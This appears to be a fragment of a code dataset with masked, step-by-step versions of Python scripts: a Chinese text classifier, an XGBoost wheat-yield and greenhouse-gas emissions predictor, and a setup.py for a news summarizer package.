cPickle.load(open(os.path.join(outputfile,\"test.data\"),\"rb\"))\nvectorizer = cPickle.load(open(os.path.join(outputfile,\"vectorizer.data\"),\"rb\"))\nchi2 = cPickle.load(open(os.path.join(outputfile,\"ch2.data\"),\"rb\"))\nclf = cPickle.load(open(os.path.join(outputfile,\"SGD_l2.model\"),\"rb\"))\n#inputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\4月份\\\\financeoutput1_final.txt\"\n#outputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\4月份\\\\大宗商品.txt\"\n\ninputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\financeoutput1_final_05.txt\"\noutputpath =u\"E:\\\\项目需求\\\\JDPower\\\\分类\\\\5月份\\\\大宗商品.txt\"\n\nlabel = \"大宗商品\"\n\nforbidkword = {}\n# load\n\nforbidpath = u\"..//keyword.txt\"\nwith open(forbidpath, \"rb\") as f:\n for line in f:\n word = line.strip()\n forbidkword[word] = 0\n\noutfile = open(outputpath,\"wb\")\nwith open(inputpath, \"rb\") as f:\n for line in f:\n splits = line.strip().split(\"\\t\")\n tag = splits[0]\n\n if tag.find(label) > -1 :\n print(tag)\n train = []\n #print (splits[-1])\n seg = jieba_cut.cut(splits[-1], cut_all=False)\n #seglist = [i for i in seg]\n seglist = []\n for w in seg:\n #print w\n w = w.strip().encode(\"utf-8\")\n if w not in forbidkword:\n if not re.match(r\"\\d+$\", w):\n seglist.append(w)\n train.append(\" \".join(seglist))\n X_test = vectorizer.transform(train)\n X_test = chi2.transform(X_test)\n pred = clf.predict(X_test)\n #print(\" \".join(pred))\n print (pred)\n lb = str(pred[0])\n #print(isinstance(lb, unicode))\n #print( lb.decode(\"gbk\").encode(\"utf-8\"))\n #outfile.writelines(lb+\"\\n\")\n if lb == '1' :\n outfile.writelines(line.strip()+\"\\t\")\n outfile.writelines(lb+\"\\n\")\n #outfile.writelines(line.strip()+\"\\t\"+lb.decode(\"utf-8\").encode(\"utf-8\")+\"\\n\")\noutfile.close()",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
model.fit(X_train, Y_train)
print(dataset_df_2.columns)
print(model.feature_importances_)
<|reserved_special_token_0|>
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
<|reserved_special_token_0|>
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
<|reserved_special_token_0|>
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f"GHG and yield predictions (Area: {rand_row['Area']} ha)")
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
<|reserved_special_token_0|>
ax2.set_ylabel('CO2 (kg)', color=color)
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout()
plt.show()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
predictor = GHGPredictor()
dataset_df = pd.read_csv('db-wheat.csv', index_col=0)
dataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',
'Previous crop'])
dataset = dataset_df_2.to_numpy()
X, Y = dataset[:, :-1], dataset[:, -1:]
seed = 10
test_size = 0.2
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=
test_size, random_state=seed)
model = XGBRegressor()
model.fit(X_train, Y_train)
print(dataset_df_2.columns)
print(model.feature_importances_)
y_pred = model.predict(X_test)
Y_test = map(lambda x: x[0], Y_test)
res = zip(y_pred, Y_test)
ghg_predictor = GHGPredictor()
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
<|reserved_special_token_0|>
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
preds = predict(model, rand_row)
<|reserved_special_token_0|>
fig, ax1 = plt.subplots()
n_amount = [x[0] for x in preds]
yield_p = [x[1] for x in preds]
ghg_p = [x[2] for x in preds]
color = 'tab:red'
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f"GHG and yield predictions (Area: {rand_row['Area']} ha)")
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx()
color = 'tab:blue'
ax2.set_ylabel('CO2 (kg)', color=color)
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout()
plt.show()
<|reserved_special_token_1|>
from xgboost import XGBRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import pandas as pd
import numpy as np
from ghg import GHGPredictor
predictor = GHGPredictor()
dataset_df = pd.read_csv('db-wheat.csv', index_col=0)
dataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',
'Previous crop'])
dataset = dataset_df_2.to_numpy()
X, Y = dataset[:, :-1], dataset[:, -1:]
seed = 10
test_size = 0.2
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=
test_size, random_state=seed)
model = XGBRegressor()
model.fit(X_train, Y_train)
print(dataset_df_2.columns)
print(model.feature_importances_)
y_pred = model.predict(X_test)
Y_test = map(lambda x: x[0], Y_test)
res = zip(y_pred, Y_test)
ghg_predictor = GHGPredictor()
def predict(model, row):
preds = []
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
new_row = new_row.drop(labels=['Area', 'Year', 'Crop',
'Previous crop', 'Yield'])
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],
row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'
.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
import random
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
preds = predict(model, rand_row)
import matplotlib.pyplot as plt
fig, ax1 = plt.subplots()
n_amount = [x[0] for x in preds]
yield_p = [x[1] for x in preds]
ghg_p = [x[2] for x in preds]
color = 'tab:red'
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f"GHG and yield predictions (Area: {rand_row['Area']} ha)")
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx()
color = 'tab:blue'
ax2.set_ylabel('CO2 (kg)', color=color)
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout()
plt.show()
<|reserved_special_token_1|>
from xgboost import XGBRegressor
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
import pandas as pd
import numpy as np
from ghg import GHGPredictor
predictor = GHGPredictor()
dataset_df = pd.read_csv("db-wheat.csv", index_col=0)
# print(dataset_df.iloc[1])
dataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop', 'Previous crop'])
# print(dataset_df_2)
dataset = dataset_df_2.to_numpy()
# print(dataset)
X, Y = dataset[:, :-1], dataset[:, -1:]
# print(X)
# print(Y)
seed = 10
test_size = 0.2
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)
# print(len(X_train))
# print(len(X_test))
# print(len(Y_train))
# print(len(Y_test))
model = XGBRegressor()
model.fit(X_train, Y_train)
# print(model)
print(dataset_df_2.columns)
print(model.feature_importances_)
# print(X_test.shape)
y_pred = model.predict(X_test)
# predictions = [round(value) for value in y_pred]
Y_test = map(lambda x: x[0], Y_test)
# print(Y_test)
res = zip(y_pred, Y_test)
# print(list(res))
ghg_predictor = GHGPredictor()
def predict(model, row):
preds = []
# print(row)
# print(row.).shape)
for perc in range(-10, 11):
new_row = row.copy()
row_copy = row.copy()
# new_row = new_row.iloc[0]
new_row = new_row.drop(labels=['Area', 'Year', 'Crop', 'Previous crop', 'Yield'])
# print(new_row.labels)
# new_row = new_row.tolist()
# print(new_row)
# print(type(new_row))
nitrogen = new_row['N'] * ((100 + perc) / 100)
new_row['N'] = nitrogen
row_copy['N'] = nitrogen
new_row = np.array([new_row])
# print(new_row)
pred = model.predict(new_row)
row_df = pd.DataFrame([row_copy])
fuel_ghg = predictor.fuel_ghg_emissions(row_df["Area"], unit="kg")
fuel_ghg = fuel_ghg.values[0]
ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'], row_df['Area'], row_df['Crop'], row_df['Yield'])
ms_ghg = ms_ghg.values[0]
sum_ghg = fuel_ghg + ms_ghg
area = row_df['Area'].iloc[0]
# print(area)
# print(sum_ghg)
# print(row_df['N'])
# print(sum_ghg)
# GHG
# fuel = ghg_predictor.fuel_ghg_emissions()
preds.append([nitrogen, pred[0], sum_ghg])
print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))
return preds
# accuracy = accuracy_score(Y_test, predictions)
# print("Accuracy: %.2f%%" % (accuracy * 100.0))
import random
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
while rand_row['N'] == 0:
rand_ind = random.randrange(0, len(dataset))
rand_row = dataset_df.iloc[rand_ind]
# rand_row = rand_row[:-1]
preds = predict(model, rand_row)
import matplotlib.pyplot as plt
fig, ax1 = plt.subplots()
n_amount = [x[0] for x in preds]
yield_p = [x[1] for x in preds]
ghg_p = [x[2] for x in preds]
color = 'tab:red'
ax1.set_xlabel('N')
ax1.set_ylabel('Yield (t)', color=color)
ax1.set_title(f'GHG and yield predictions (Area: {rand_row["Area"]} ha)')
ax1.plot(n_amount, yield_p, color=color)
ax1.tick_params(axis='y', labelcolor=color)
ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis
color = 'tab:blue'
ax2.set_ylabel('CO2 (kg)', color=color) # we already handled the x-label with ax1
ax2.plot(n_amount, ghg_p, color=color)
ax2.tick_params(axis='y', labelcolor=color)
print(n_amount)
fig.tight_layout() # otherwise the right y-label is slightly clipped
plt.show()
|
flexible
|
{
"blob_id": "0ebd3ca5fd29b0f2f2149dd162b37f39668f1c58",
"index": 7397,
"step-1": "<mask token>\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\n<mask token>\n",
"step-2": "<mask token>\nmodel.fit(X_train, Y_train)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\n<mask token>\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\n<mask token>\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\n<mask token>\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f\"GHG and yield predictions (Area: {rand_row['Area']} ha)\")\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n<mask token>\nax2.set_ylabel('CO2 (kg)', color=color)\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\nprint(n_amount)\nfig.tight_layout()\nplt.show()\n",
"step-3": "<mask token>\npredictor = GHGPredictor()\ndataset_df = pd.read_csv('db-wheat.csv', index_col=0)\ndataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',\n 'Previous crop'])\ndataset = dataset_df_2.to_numpy()\nX, Y = dataset[:, :-1], dataset[:, -1:]\nseed = 10\ntest_size = 0.2\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=\n test_size, random_state=seed)\nmodel = XGBRegressor()\nmodel.fit(X_train, Y_train)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\ny_pred = model.predict(X_test)\nY_test = map(lambda x: x[0], Y_test)\nres = zip(y_pred, Y_test)\nghg_predictor = GHGPredictor()\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\n<mask token>\nrand_ind = random.randrange(0, len(dataset))\nrand_row = dataset_df.iloc[rand_ind]\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\npreds = predict(model, rand_row)\n<mask token>\nfig, ax1 = plt.subplots()\nn_amount = [x[0] for x in preds]\nyield_p = [x[1] for x in preds]\nghg_p = [x[2] for x in preds]\ncolor = 'tab:red'\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f\"GHG and yield predictions (Area: {rand_row['Area']} ha)\")\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\nax2 = ax1.twinx()\ncolor = 'tab:blue'\nax2.set_ylabel('CO2 (kg)', color=color)\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\nprint(n_amount)\nfig.tight_layout()\nplt.show()\n",
"step-4": "from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport numpy as np\nfrom ghg import GHGPredictor\npredictor = GHGPredictor()\ndataset_df = pd.read_csv('db-wheat.csv', index_col=0)\ndataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop',\n 'Previous crop'])\ndataset = dataset_df_2.to_numpy()\nX, Y = dataset[:, :-1], dataset[:, -1:]\nseed = 10\ntest_size = 0.2\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=\n test_size, random_state=seed)\nmodel = XGBRegressor()\nmodel.fit(X_train, Y_train)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\ny_pred = model.predict(X_test)\nY_test = map(lambda x: x[0], Y_test)\nres = zip(y_pred, Y_test)\nghg_predictor = GHGPredictor()\n\n\ndef predict(model, row):\n preds = []\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop',\n 'Previous crop', 'Yield'])\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n pred = model.predict(new_row)\n row_df = pd.DataFrame([row_copy])\n fuel_ghg = predictor.fuel_ghg_emissions(row_df['Area'], unit='kg')\n fuel_ghg = fuel_ghg.values[0]\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'],\n row_df['Area'], row_df['Crop'], row_df['Yield'])\n ms_ghg = ms_ghg.values[0]\n sum_ghg = fuel_ghg + ms_ghg\n area = row_df['Area'].iloc[0]\n preds.append([nitrogen, pred[0], sum_ghg])\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'\n .format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n return preds\n\n\nimport random\nrand_ind = random.randrange(0, len(dataset))\nrand_row = dataset_df.iloc[rand_ind]\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\npreds = predict(model, rand_row)\nimport matplotlib.pyplot as plt\nfig, ax1 = plt.subplots()\nn_amount = [x[0] for x in preds]\nyield_p = [x[1] for x in preds]\nghg_p = [x[2] for x in preds]\ncolor = 'tab:red'\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f\"GHG and yield predictions (Area: {rand_row['Area']} ha)\")\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\nax2 = ax1.twinx()\ncolor = 'tab:blue'\nax2.set_ylabel('CO2 (kg)', color=color)\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\nprint(n_amount)\nfig.tight_layout()\nplt.show()\n",
"step-5": "from xgboost import XGBRegressor\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport pandas as pd\nimport numpy as np\n\nfrom ghg import GHGPredictor\n\npredictor = GHGPredictor()\n\ndataset_df = pd.read_csv(\"db-wheat.csv\", index_col=0)\n\n# print(dataset_df.iloc[1])\n\ndataset_df_2 = dataset_df.drop(columns=['Area', 'Year', 'Crop', 'Previous crop'])\n# print(dataset_df_2)\n\ndataset = dataset_df_2.to_numpy()\n\n# print(dataset)\n\nX, Y = dataset[:, :-1], dataset[:, -1:]\n\n# print(X)\n# print(Y)\n\nseed = 10\ntest_size = 0.2\n\nX_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\n\n# print(len(X_train))\n# print(len(X_test))\n# print(len(Y_train))\n# print(len(Y_test))\n\nmodel = XGBRegressor()\nmodel.fit(X_train, Y_train)\n\n# print(model)\nprint(dataset_df_2.columns)\nprint(model.feature_importances_)\n\n# print(X_test.shape)\ny_pred = model.predict(X_test)\n# predictions = [round(value) for value in y_pred]\n\nY_test = map(lambda x: x[0], Y_test)\n# print(Y_test)\n\nres = zip(y_pred, Y_test)\n\n# print(list(res))\n\nghg_predictor = GHGPredictor()\n\ndef predict(model, row):\n preds = []\n # print(row)\n # print(row.).shape)\n for perc in range(-10, 11):\n new_row = row.copy()\n row_copy = row.copy()\n\n # new_row = new_row.iloc[0]\n new_row = new_row.drop(labels=['Area', 'Year', 'Crop', 'Previous crop', 'Yield'])\n # print(new_row.labels)\n # new_row = new_row.tolist()\n\n # print(new_row)\n # print(type(new_row))\n nitrogen = new_row['N'] * ((100 + perc) / 100)\n\n new_row['N'] = nitrogen\n row_copy['N'] = nitrogen\n new_row = np.array([new_row])\n # print(new_row)\n pred = model.predict(new_row)\n\n\n row_df = pd.DataFrame([row_copy])\n\n fuel_ghg = predictor.fuel_ghg_emissions(row_df[\"Area\"], unit=\"kg\")\n \n fuel_ghg = fuel_ghg.values[0]\n\n ms_ghg = predictor.managed_soils_ghg(row_df['N'], row_df['Manure'], row_df['Area'], row_df['Crop'], row_df['Yield'])\n\n ms_ghg = ms_ghg.values[0]\n\n\n sum_ghg = fuel_ghg + ms_ghg\n\n area = row_df['Area'].iloc[0]\n # print(area)\n\n # print(sum_ghg)\n # print(row_df['N'])\n\n # print(sum_ghg)\n\n # GHG\n # fuel = ghg_predictor.fuel_ghg_emissions()\n\n preds.append([nitrogen, pred[0], sum_ghg])\n\n print('{:4}% | Yield: {:.2f} | Area {} | C02_ha {:.5f} | C02 {:.5f}'.format(100 + perc, pred[0], area, sum_ghg / area, sum_ghg))\n\n return preds\n\n# accuracy = accuracy_score(Y_test, predictions)\n# print(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\nimport random\n\nrand_ind = random.randrange(0, len(dataset))\nrand_row = dataset_df.iloc[rand_ind]\nwhile rand_row['N'] == 0:\n rand_ind = random.randrange(0, len(dataset))\n rand_row = dataset_df.iloc[rand_ind]\n# rand_row = rand_row[:-1]\n\npreds = predict(model, rand_row)\n\nimport matplotlib.pyplot as plt\n\nfig, ax1 = plt.subplots()\n\nn_amount = [x[0] for x in preds]\nyield_p = [x[1] for x in preds]\nghg_p = [x[2] for x in preds]\n\ncolor = 'tab:red'\nax1.set_xlabel('N')\nax1.set_ylabel('Yield (t)', color=color)\nax1.set_title(f'GHG and yield predictions (Area: {rand_row[\"Area\"]} ha)')\nax1.plot(n_amount, yield_p, color=color)\nax1.tick_params(axis='y', labelcolor=color)\n\nax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n\ncolor = 'tab:blue'\nax2.set_ylabel('CO2 (kg)', color=color) # we already handled the x-label with ax1\nax2.plot(n_amount, ghg_p, color=color)\nax2.tick_params(axis='y', labelcolor=color)\n\nprint(n_amount)\n\nfig.tight_layout() # otherwise the right y-label is slightly clipped\nplt.show()\n\n\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
setup(name='sgcharts-pointer-generator', version=__version__,
python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',
'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',
'*.tests.*', 'tests.*', 'tests']), include_package_data=True,
description='News Summarizer')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
__version__ = '2.0'
setup(name='sgcharts-pointer-generator', version=__version__,
python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',
'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',
'*.tests.*', 'tests.*', 'tests']), include_package_data=True,
description='News Summarizer')
<|reserved_special_token_1|>
from setuptools import setup, find_packages
__version__ = '2.0'
setup(name='sgcharts-pointer-generator', version=__version__,
python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',
'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',
'*.tests.*', 'tests.*', 'tests']), include_package_data=True,
description='News Summarizer')
<|reserved_special_token_1|>
from setuptools import setup, find_packages
__version__ = '2.0'
setup(
name='sgcharts-pointer-generator',
version=__version__,
python_requires='>=3.5.0',
install_requires=[
'tensorflow==1.10.0',
'pyrouge==0.1.3',
'spacy==2.0.12',
'en_core_web_sm==2.0.0',
'sgcharts-stringx==1.1.1'
],
packages=find_packages(exclude=["*.tests", "*.tests.*", "tests.*", "tests"]),
include_package_data=True,
description='News Summarizer'
)
|
flexible
|
{
"blob_id": "e52b01cc7363943f5f99b1fa74720c6447b1cfae",
"index": 6266,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nsetup(name='sgcharts-pointer-generator', version=__version__,\n python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',\n 'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',\n '*.tests.*', 'tests.*', 'tests']), include_package_data=True,\n description='News Summarizer')\n",
"step-3": "<mask token>\n__version__ = '2.0'\nsetup(name='sgcharts-pointer-generator', version=__version__,\n python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',\n 'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',\n '*.tests.*', 'tests.*', 'tests']), include_package_data=True,\n description='News Summarizer')\n",
"step-4": "from setuptools import setup, find_packages\n__version__ = '2.0'\nsetup(name='sgcharts-pointer-generator', version=__version__,\n python_requires='>=3.5.0', install_requires=['tensorflow==1.10.0',\n 'pyrouge==0.1.3', 'spacy==2.0.12', 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'], packages=find_packages(exclude=['*.tests',\n '*.tests.*', 'tests.*', 'tests']), include_package_data=True,\n description='News Summarizer')\n",
"step-5": "from setuptools import setup, find_packages\n\n__version__ = '2.0'\n\nsetup(\n name='sgcharts-pointer-generator',\n version=__version__,\n python_requires='>=3.5.0',\n install_requires=[\n 'tensorflow==1.10.0',\n 'pyrouge==0.1.3',\n 'spacy==2.0.12',\n 'en_core_web_sm==2.0.0',\n 'sgcharts-stringx==1.1.1'\n ],\n packages=find_packages(exclude=[\"*.tests\", \"*.tests.*\", \"tests.*\", \"tests\"]),\n include_package_data=True,\n description='News Summarizer'\n)\n",
